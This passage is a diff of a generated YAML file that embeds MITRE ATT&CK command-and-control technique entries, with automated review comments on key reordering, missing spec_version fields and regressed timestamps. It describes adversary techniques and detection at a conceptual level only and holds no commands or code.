in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37204,8 +37678,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37267,7 +37739,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37315,7 +37786,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37369,7 +37839,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090:
technique:
@@ -37402,7 +37871,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T19:16:11.648Z'
name: Proxy
description: |-
Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37422,8 +37891,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1568:
technique:
@@ -37461,7 +37928,7 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:26:23.782Z'
name: Dynamic Resolution
description: |-
Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37489,42 +37956,22 @@ command-and-control:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1102:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Anastasios Pingios
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
- type: attack-pattern
- created: '2017-05-31T21:31:13.915Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1102
- url: https://attack.mitre.org/techniques/T1102
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-07T17:53:54.380Z'
name: Web Service
description: |-
- Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+ Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - Anastasios Pingios
+ - Sarathkumar Rajendran, Microsoft Defender365
+ x_mitre_deprecated: false
x_mitre_detection: 'Host data that can relate unknown or suspicious process
activity using a network connection is important to supplement any existing
indicators of compromise based on malware command and control signatures and
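Review bot: key reordering buries the two real changes to T1102 here: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` are removed at the top of the object and re-emitted lower down, so the added Broadcom BirdyClient citation in the description and the new contributor `Sarathkumar Rajendran, Microsoft Defender365` are easy to miss. T1571 and T1001.003 show the same reorder further on. If the generator takes key order from the upstream STIX object, consider sorting keys deterministically on output so future regenerations diff only on content.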
@@ -37533,17 +37980,39 @@ command-and-control:
for uncommon data flows (e.g., a client sending significantly more data than
it receives from a server). User behavior monitoring may help to detect abnormal
patterns of activity.(Citation: University of Birmingham C2)'
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+ created: '2017-05-31T21:31:13.915Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1102
+ external_id: T1102
+ - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+ description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+ Graph API for C&C communication. Retrieved July 1, 2024.
+ url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1568.003:
technique:
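Review bot: `x_mitre_permissions_required: - User` is removed from T1102 with no replacement, while the same field is retained in this diff for T1568, T1205.001, T1102.003 and T1102.002; confirm this reflects the upstream object rather than a generator filter, and check whether any consumer keys on the field. The new `(Citation: Broadcom BirdyClient Microsoft Graph API 2024)` in the description does have its matching `external_references` entry here, and the bump from `1.1` to `1.2` is consistent with a description change.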
@@ -37575,7 +38044,7 @@ command-and-control:
description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
Operations. Retrieved March 6, 2017.
url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T20:54:28.287Z'
name: DNS Calculation
description: |-
Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37592,8 +38061,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1104:
technique:
@@ -37613,7 +38080,7 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1104
external_id: T1104
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:43:38.181Z'
name: Multi-Stage Channels
description: |-
Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37636,8 +38103,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1205.001:
technique:
@@ -37662,7 +38127,7 @@ command-and-control:
description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
backdoor. Retrieved October 13, 2018.'
source_name: Hartrell cd00r 2002
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:31:23.996Z'
name: Port Knocking
description: |-
Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37687,8 +38152,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.002:
technique:
@@ -37753,7 +38216,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1102.003:
technique:
@@ -37777,7 +38239,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:26:10.109Z'
name: One-Way Communication
description: |-
Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37802,21 +38264,36 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.003:
technique:
- modified: '2024-04-19T13:24:36.872Z'
+ modified: '2024-09-25T20:48:24.411Z'
name: 'Proxy: Multi-hop Proxy'
- description: |-
- Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
- For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
- In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN). Protocols such as ICMP may be used as a transport.
-
- Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+ description: "Adversaries may chain together multiple proxies to disguise the
+ source of malicious traffic. Typically, a defender will be able to identify
+ the last proxy traffic traversed before it enters their network; the defender
+ may or may not be able to identify any previous proxies before the last-hop
+ proxy. This technique makes identifying the original source of the malicious
+ traffic even more difficult by requiring the defender to trace malicious traffic
+ through several proxies to identify its source.\n\nFor example, adversaries
+ may construct or use onion routing networks – such as the publicly available
+ [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+ C2 traffic through a compromised population, allowing communication with any
+ device within the network.(Citation: Onion Routing) Adversaries may also use
+ operational relay box (ORB) networks composed of virtual private servers (VPS),
+ Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+ obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+ infrastructure, it is possible for an adversary to leverage multiple compromised
+ devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+ By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+ on routers, adversaries can add custom code to the affected network devices
+ that will implement onion routing between those nodes. This method is dependent
+ upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+ method allowing the adversaries to cross the protected network boundary of
+ the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+ \ Protocols such as ICMP may be used as a transport. \n\nSimilarly, adversaries
+ may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+ routing between a decentralized network of peers.(Citation: NGLite Trojan)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
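Review bot: switching the T1090.003 description from a `|-` block scalar to a folded double-quoted string hides the one substantive addition (the ORB network sentence) inside a full rewrite and introduces quoting artefacts: `\ Protocols such as ICMP` escapes a leading space, so the parsed text carries a double space after `WAN).`, and there is a stray space before `(Citation: ORB Mandiant)`. If those spaces exist in the upstream STIX they should stay, but the dumper should be configured to keep multi-line strings as block scalars; the file already mixes both forms (T1071 and T1001.003 are double-quoted, T1205 and T1102 use `|-`), which points to a dump-setting inconsistency rather than a deliberate choice. The `ORB Mandiant` citation does get its `external_references` entry in a following hunk.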
@@ -37835,7 +38312,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.1'
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37849,6 +38326,11 @@ command-and-control:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1090/003
external_id: T1090.003
+ - source_name: ORB Mandiant
+ description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+ Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+ July 8, 2024.
+ url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
- source_name: NGLite Trojan
description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37862,12 +38344,11 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1090.003
atomic_tests: []
T1001:
technique:
- modified: '2024-02-02T19:04:35.389Z'
+ modified: '2024-10-07T15:07:47.232Z'
name: Data Obfuscation
description: 'Adversaries may obfuscate command and control traffic to make
it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37917,11 +38398,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1571:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:37:57.868Z'
name: Non-Standard Port
description: |-
Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37930,20 +38410,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze packet contents to detect communications that do
not follow the expected protocol behavior for the port that is being used.
Analyze network data for uncommon data flows (e.g., a client sending significantly
more data than it receives from a server). Processes utilizing the network
that do not normally have network communication or have never been seen before
are suspicious.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
@@ -37968,17 +38448,16 @@ command-and-control:
url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
- source_name: change_rdp_port_conti
description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
- Retrieved March 1, 2022.'
- url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+ Retrieved September 12, 2024.'
+ url: https://x.com/TheDFIRReport/status/1498657772254240768
- source_name: Fortinet Agent Tesla April 2018
description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
Variant. Retrieved November 5, 2018.
url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1571
atomic_tests: []
T1573:
@@ -38034,7 +38513,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1573
atomic_tests: []
T1102.002:
@@ -38059,7 +38537,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-26T23:15:47.861Z'
name: Bidirectional Communication
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
@@ -38096,8 +38574,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1573.002:
technique:
@@ -38151,7 +38627,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1095:
technique:
@@ -38223,33 +38698,12 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1095
atomic_tests: []
T1001.003:
technique:
- x_mitre_platforms:
- - Linux
- - Windows
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
- type: attack-pattern
- created: '2020-03-15T00:40:27.503Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1001.003
- url: https://attack.mitre.org/techniques/T1001/003
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
- name: Protocol Impersonation
+ modified: '2024-10-09T15:40:19.436Z'
+ name: Protocol or Service Impersonation
description: "Adversaries may impersonate legitimate protocols or web service
traffic to disguise command and control activity and thwart analysis efforts.
By impersonating legitimate protocols or web services, adversaries can make
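Review bot: make sure every other generated artefact that embeds the technique name is regenerated in the same change as this rename of T1001.003 from `Protocol Impersonation` to `Protocol or Service Impersonation`; the link text in the T1572 description is already updated to match earlier in this diff, so the remaining risk is a stale name in any index or table that is produced separately from this file.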
@@ -38257,23 +38711,61 @@ command-and-control:
\ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
like subsequent traffic is SSL/TLS encrypted, potentially interfering with
some security tooling, or to make the traffic look like it is related with
- a trusted entity. "
+ a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+ impersonate expected web traffic or trusted services. For example, adversaries
+ may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+ data to disguise C2 communications or mimic legitimate services such as Gmail,
+ Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+ Malleable-C2-U42)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
+ x_mitre_contributors:
+ - James Emery-Callcott, Emerging Threats Team, Proofpoint
+ x_mitre_deprecated: false
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used.(Citation: University of Birmingham C2)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+ created: '2020-03-15T00:40:27.503Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1001/003
+ external_id: T1001.003
+ - source_name: Malleable-C2-U42
+ description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+ Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+ How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+ September 24, 2024.'
+ url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+ - source_name: University of Birmingham C2
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ - source_name: ESET Okrum July 2019
+ description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+ RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1090.004:
technique:
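Review bot: `spec_version: '2.1'` is removed from this object (and from every other technique touched by this patch) with nothing put in its place; if any consumer validates these embedded objects as STIX 2.1 or reads `spec_version` to choose a parser, it will now find the key missing, so confirm the generator strips it on purpose rather than losing it because the source bundle changed shape. The rest of the hunk is internally consistent: the two new citation markers in the description, `(Citation: ESET Okrum July 2019)` and `(Citation: Malleable-C2-U42)`, both have matching `external_references` entries, and the bump to `x_mitre_version: '2.0'` goes together with `x_mitre_attack_spec_version: 3.2.0`.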
@@ -38320,7 +38812,6 @@ command-and-control:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1132:
technique:
@@ -38380,7 +38871,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.002:
technique:
@@ -38412,7 +38902,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-14T23:39:50.117Z'
name: Non-Standard Encoding
description: 'Adversaries may encode data with a non-standard data encoding
system to make the content of command and control traffic more difficult to
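Review bot: `modified` for T1132.002 moves backwards here, from `'2021-04-29T14:49:39.188Z'` to `'2020-03-14T23:39:50.117Z'`, and the same regression appears further down for T1001.002, T1008, T1102.001, T1602, T1560.003, T1114.001, T1560.002 and T1005. A `modified` timestamp that goes back in time usually means the regeneration consumed a different copy of the object than the previous run (an older bundle, or one where a batch re-stamp was undone), so please confirm which ATT&CK STIX release the generator read and state it in the PR description; if the upstream value really is the older one, a one-line note saying so will save the next reviewer the same question.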
@@ -38438,8 +38928,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.001:
technique:
@@ -38506,7 +38994,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.001
atomic_tests: []
T1105:
@@ -38604,7 +39091,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1105
atomic_tests: []
T1665:
@@ -38697,7 +39183,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1001.002:
technique:
@@ -38721,7 +39206,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-15T00:37:58.963Z'
name: Data Obfuscation via Steganography
description: 'Adversaries may use steganographic techniques to hide command
and control traffic to make detection efforts more difficult. Steganographic
@@ -38744,8 +39229,6 @@ command-and-control:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1001.002
atomic_tests: []
T1008:
@@ -38770,7 +39253,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-07-14T19:49:47.340Z'
name: Fallback Channels
description: Adversaries may use fallback or alternate communication channels
if the primary channel is compromised or inaccessible in order to maintain
@@ -38790,8 +39273,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1090.001:
technique:
@@ -38845,7 +39326,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
